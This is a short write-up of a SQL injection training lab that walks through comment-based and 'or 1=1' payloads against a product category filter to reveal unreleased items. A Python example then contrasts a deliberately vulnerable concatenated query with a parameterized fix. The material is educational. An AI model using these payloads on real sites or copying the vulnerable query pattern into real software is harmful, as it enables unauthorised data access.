Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

Yikai
3 min read · Nov 21, 2020

This lab contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

First, let’s click on a category.

After clicking on the corporate gifts category, the URL shows:

https://ac321f581f89aa2e808a3eb200d10094.web-security-academy.net/filter?category=Corporate+gifts

Notice the query string at the end of the URL: ?category=Corporate+gifts

The application will make an SQL query to retrieve information from the database:

SELECT * FROM products WHERE category = 'Corporate gifts' AND released = 1

The objective is to retrieve information on all products, from every category, both released and unreleased.

The statement above includes released = 1, meaning it only shows products that are released; released = 0 represents unreleased products.

Next, I add a single quote at the end of the query string:

?category=Corporate+gifts'

In the SQL query:

SELECT * FROM products WHERE category = 'Corporate gifts'' AND released = 1

This will cause an error, as there is one single quote that is not closed.

Next, I add a double dash:

?category=Corporate+gifts'--

In the SQL query:

SELECT * FROM products WHERE category = 'Corporate gifts'--' AND released = 1

Anything after the -- is treated as a comment in SQL, so the AND released = 1 condition is no longer applied.

This means the website should now show all products in the Corporate gifts category, both released and unreleased. Notice that there is an additional item called Folding Gadgets.

To show every product in the database:

?category=Corporate+gifts' or 1=1--

In the SQL query:

SELECT * FROM products WHERE category = 'Corporate gifts' or 1=1--' AND released = 1

With the above query, the database returns every product where the category is Corporate gifts or 1=1 is true. Since 1=1 is always true, it returns all items.

Your lab should be solved at this point.
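To see why these inputs work and what stops them, here is an added example (not part of the original post or the lab's code) that runs the four category values from this write-up through a string-concatenated query and a parameterized one. It assumes an in-memory SQLite database; the table layout, the function names, and every product name except Folding Gadgets are constructed for illustration.

```python
import sqlite3

# Constructed sample data standing in for the lab's products table (assumption).
ROWS = [
    ("Conference pen", "Corporate gifts", 1),
    ("Folding Gadgets", "Corporate gifts", 0),
    ("Snow globe", "Gifts", 1),
    ("Prototype mug", "Gifts", 0),
]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)", ROWS)
    return db

def filter_vulnerable(db, category):
    # Input is pasted into the SQL text, so a quote in it ends the string literal
    # and whatever follows is parsed as SQL.
    sql = "SELECT name FROM products WHERE category = '" + category + "' AND released = 1"
    return sorted(row[0] for row in db.execute(sql))

def filter_safe(db, category):
    # Input is bound as a parameter: it is only ever compared as a value.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(row[0] for row in db.execute(sql, (category,)))

def compare(category):
    """Return (vulnerable result or error text, parameterized result)."""
    db = make_db()
    try:
        vulnerable = filter_vulnerable(db, category)
    except sqlite3.Error as exc:
        vulnerable = "SQL error: %s" % exc
    return vulnerable, filter_safe(db, category)

if __name__ == "__main__":
    # The four category values used in this write-up.
    for value in ("Corporate gifts", "Corporate gifts'",
                  "Corporate gifts'--", "Corporate gifts' or 1=1--"):
        print(repr(value), compare(value))
```

With the parameterized query, the quote and the -- are just characters in a category name that matches nothing, so the released = 1 filter always stays in effect.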
